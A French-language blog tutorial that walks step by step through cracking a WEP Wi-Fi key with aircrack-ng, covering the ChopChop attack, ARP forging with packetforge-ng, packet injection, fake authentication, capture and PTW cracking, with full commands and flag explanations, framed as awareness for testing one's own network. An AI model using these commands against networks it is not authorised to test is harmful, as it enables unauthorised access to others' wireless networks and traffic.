Post Populaire



Avant de se lancer dans la sécurité réseau :
Il faut avoir quelques connaissances en informatique.
Posséder un Live-CD de Linux.
Etre patient !
Il est formellement interdit de s'introduire dans un réseau sans en avoir eu l'autorisation du propriétaire.

Ce tutoriel a pour unique but de sensibiliser les gens au piratage. Le piratage est un fait grave. Des peines et amendes pourraient être encourues aux petits malins qui utiliseraient ce tutoriel à des fins malhonnêtes.

Toutefois vous avez parfaitement le droit de tester la sécurité de votre réseau et uniquement votre réseau ! TutoWorld décline toutes responsabilités.

L'attaque ChopChop a pour but d'injecter un faux ARP afin de stimuler la production des IVS nécessaire au craquage de votre clé Wep. Cette attaque est très efficace lorsqu'une station connectée ne génère pas d'ARP.
Comme d'habitude, seule une station connectée (et valide) est pré requis pour tenter l'attaque.
Pour commencer, il faut posséder un Live-CD (CD Bootable) de Linux. Vous pouvez télécharger Backtrack 2 directement ou alors connectez vous sur votre espace membre. Une fois téléchargé, il faut graver le fichier image (iso) avec Néro ou PowerIso par exemple.
Vous devez ensuite insérer le CD dans le lecteur de manière à booter sur le CD (vous devez peut-être changer la séquence de boot dans le BIOS).
Attendez ensuite quelques minutes et vous devriez voir cet écran de démarrage :
Login : root
Pass : toor
Une fois logué, entrer la commande startx (attention clavier qzerty donc il faut écrire stqrtx).



Une fois le bureau chargé, changer la langue en cliquant sur l'icône en bas à droite du bureau.



Ouvrez une console (icône en bas à gauche de couleur noire) et c'est parti !
L'attaque Chopchop

Utilisons l'attaque ChopChop (-4) au lieu de l'attaque par injection de paquets (-3).
aireplay-ng -4 -b Adresse_Mac_Reseau -h Adresse_Mac_Station INTERFACE_WIFI

-4 : Indique que l'on utilise l'attaque ChopChop. Obligatoire.
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.



Lorsque l'attaque est lancée, le programme read des paquets. Dès qu'il trouve une trame intéressante, vous apercevez des trucs bizarres (voir screen).



Le programme vous demande si vous souhaitez utiliser cette trame. Répondez naturellement par y (Yes).
Un fichier xor se construit. Cela peut prendre plusieurs minutes si vous êtes loin de l'AP. Aireplay-ng va créer deux fichiers (un fichier xor et un fichier cap) portant le même nom mais pas la même extension. Notez bien le nom de ces fichiers. Ils vous seront utiles pour la suite.



Maintenant il faut trouver l'adressage du réseau. Cela ne devrait pas être difficile puisque vous êtes le propriétaire !
Je vous donne quand même la commande pour trouver l'adressage du réseau.
tcpdump -s 0 -n -e -r Fichier_Cap_Creer_Avant



Le fichier cap que vous devez indiquer est celui créé au préalable par l'attaque Chopchop.
Seule l'ip source (station) est visible. Il faut deviner l'ip de destination (le plus souvent c'est 192.168.0.1 ou 192.168.1.1 voire 192.168.0.254 pour les Freebox)
Dans notre cas, on a : 192.168.0.3 (source) et 192.168.0.254 (destination).
Maintenant on va créer notre faux ARP que l'on va injecter par la suite. Pour cela, on va utiliser packetforge-ng dont la syntaxe est un peu plus longue.
packetforge-ng -0 -a Adresse_Mac_Reseau -h Adresse_Mac_Station -k Ip_Source -l Ip_Destination -y Fichier_Xor_Creer_Avant -w Nom_Fichier_Sortie

-0 : Indique que nous voulons un paquet de type ARP. Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
-k : Ip source trouvée avec tcpdump. Obligatoire.
-l : Ip de destination trouvée avec tcpdump. Obligatoire.
-y : Fichier xor créer auparavant avec l'attaque Chopchop. Obligatoire.
-w : Nom du fichier de sortie c'est à dire le nom du fichier créé. Obligatoire.



Voilà nous y sommes presque ! Voici la syntaxe de l'injection de paquets.
aireplay -3 -e Nom_Du_Reseau -b Bssid_Du_Reseau -h Bssid_De_La_Station -x Vitesse_Injection -r Fichier_Cap_A_Utiliser INTERFACE_WIFI

-3 : Indique qu'il s'agit d'une injection de paquets. Obligatoire.
-e : Nom du réseau. Facultatif.
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION).Obligatoire.
-x : Vitesse d'injection des paquets (entre 100 et 1000). Facultatif.
-r : Fichier cap créé précédemment avec packetforge. Obligatoire.



Normalement si tout se passe bien, les ARP augmentent ainsi que les IVS.
Activer sa carte wifi et capturer des paquets

Activer sa carte Wifi avec Airmon-ng

Lancez airmon-ng :
airmon-ng start INTERFACE_WIFI Pour connaitre son interface wifi, faites seulement airmon-ng.



Capturer des paquets avec Airmon-ng

Lancez airodump-ng :
airodump-ng --write Nom_Fichier_Sortie --channel Canal --encrypt Type_De_Securite INTERFACE_WIFI

-- write : Nom du fichier cap de sortie. Obligatoire.
-- channel : Canal où se situe l'AP (entre 1 et 13). Facultatif.
-- encrypt : Filtre en fonction de la sécurité du réseau (wpa, wep, opn). Facultatif.
-- bssid : Filtre en fonction d'une adresse MAC d'un réseau. Facultatif.



L'AP visé s'appelle test_wep.



Fake authentification avec Aireplay-ng

Passons maintenant à la fake authentification.
aireplay-ng -1 30 -e Nom_Du_Reseau -a Bssid_Du_Reseau -h Bssid_De_La_Station INTERFACE WIFI

-1 30 : Indique une fake authentification avec un timeout de 30ms. Obligatoire.
-e : Nom du réseau (colonne ESSID). Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.



La syntaxe diffère très peu de celle pour l'attaque classique. Nous allons juste rajouter un timeout de 30 millisecondes au lieu de 0.
Vous allez apercevoir cette fois un message Keep-Alive packet. Dès que ce message est visible, vous pouvez continuer l'attaque.
Cracker la clé Wep avec Aircrack-ng

Lancez aircrack-ng :
aircrack-ng -x -0 -n Taille_Cle_Wep Nom_Du_Fichier_Cap_De_Aerodump

-x : Attaque classique pour casser la clé. Obligatoire.
-0 : Colorie l'écran en vert à la Matrix ! Facultatif.
-n : Si vous connaissez la taille de la clé wep (64, 128 ou 256). Facultatif.
-f : Fudge factor (entre 2 et 12). Facultatif.
-k : Désactive certaines attaques de Korek (entre 1 et 17). Facultatif.
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier). Obligatoire.



Admirez les chiffres hexadécimaux qui défilent à la Matrix... Vous devriez voir votre clé Wep au bout de quelques minutes si vous avez suffisamment d'IVS...



Cependant, un nouvel algorithme a vu le jour il y a quelques mois. Il s'agit de aircrack-ptw disponible en natif seulement avec les distributions Backtrack 2.0 et Wifiway 0.6
Une mise à jour de aircrack-ng permet d'avoir ce nouvel algorithme redoutable. (voir comment installer la mise à jour).
La syntaxe est quasi identique :
aircrack-ng -z -0 -n Taille_Cle_Wep Nom_Du_Fichier_Cap_De_Aerodump

-z : Nouvel algorithme de crackage (ptw). Obligatoire..
-0 : Colorie l'écran en vert à la Matrix ! Facultatif.
-n : Si vous connaissez la taille de la clé Wep (64, 128 ou 256). Facultatif.
-f : Fudge factor (entre 2 et 12). Facultatif.
-k : Désactive certaines attaques de Korek (entre 1 et 17). Facultatif.
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier). Obligatoire.



On remplace le « x » par « z ».
Avec cet algorithme, on peut cracker une clé Wep avec seulement 40 000 IVS. La preuve en image :



En cas d'échec, vous pouvez modifier le fudge factor (-f) entre 2 et 10.



Vous pouvez aussi désactiver un des attaques de KOREK (-k). Par défaut, aircrack utilise 17 attaques !



Et si vous le souhaitez, vous pouvez fusionner les commandes :



Si cela ne marche toujours pas,
Le fichier de capture (.cap) est corrompu.
Vous n'avez pas assez d'ivs.
Le réseau a changé de nom, clé wep ou adressage.
Vous êtes poissard !
Conclusion

La conclusion de ce tutoriel se révèle être simple... De nos jours, le cryptage Wep n'est plus du tout sécurisé quelque soit la taille de votre clé encryptage. Il suffit avec la nouvelle attaque Ptw d'accumuler 40 000 IVS afin de cracker une clé Wep 256 bits en une dizaine de minutes !
Le gros problème du cryptage Wep est que les paquets transités par la borne Wifi contiennent des informations sur la clé Wep. Il suffit alors de les sniffer afin de déchiffrer la clé Wep (c'est d'ailleurs le rôle d'Airmon-ng).
Pour conclure, oubliez vite ce type de cryptage et adoptez immédiatement un cryptage avec une clé Wpa qui ne peut se cracker que par Brute Force.

- sebdelkil 2009-2015 - Aucun droit réservé -